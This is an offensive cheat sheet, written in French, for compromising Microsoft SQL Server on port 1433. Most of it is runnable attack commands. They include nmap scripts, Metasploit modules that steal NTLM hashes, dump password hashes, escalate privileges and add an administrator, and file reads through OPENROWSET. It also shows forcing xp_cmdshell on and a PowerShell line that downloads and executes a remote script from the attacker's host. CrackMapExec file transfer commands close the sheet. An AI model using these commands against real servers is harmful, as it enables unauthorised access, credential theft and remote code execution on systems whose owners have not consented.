# MS-SQL - port 1433

## Scan

```
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
```

## Modules metasploit

{% hint style="warning" %}
Attention: Nécessite des identifiants.
{% endhint %}

```bash
#Vol de NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Execution de code
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload

#Ajouter un nouvel administrateur depuis une session meterpreter
msf> use windows/manage/mssql_local_auth_bypass
```

## Connexion

### Depuis machine linux

```bash
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
```

### Depuis une machine Windows

Télécharger SSMS (*SQL Server Management Studio*)

<https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms>

{% hint style="info" %}
Plus pratique (Interface graphique)
{% endhint %}

## Lire des fichiers internes

```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```

## Exécution de code

{% hint style="info" %}
Pour executer du code sur MSSQL, il faut que xp\_cmdshell soit activé. Si il ne l'est pas, il est possible de forcer son activation avec les droits suffisants.
{% endhint %}

### Vérification

<pre><code>> xp_cmdshell `whoami`;
<strong>> go
</strong></code></pre>

### Activer xp\_cmdshell

<pre><code><strong>> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
</strong>> reconfigure;
> go
        
        
> xp_cmdshell `whoami`;
> go
</code></pre>

### Forcer l'activation

```
> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go
        
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
        
> xp_cmdshell 'whoami';
> go
```

### Téléchargement de fichier

```
> xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://<your ip>:<port>/script.ps1')";
> go
```

#### Avec CrackMapExec

```bash
#Téléchargement
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --get-file Windows/file/path/file.txt local/file/path

#Upload
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --put-file local/file/path Windows/file/path/file.txt
```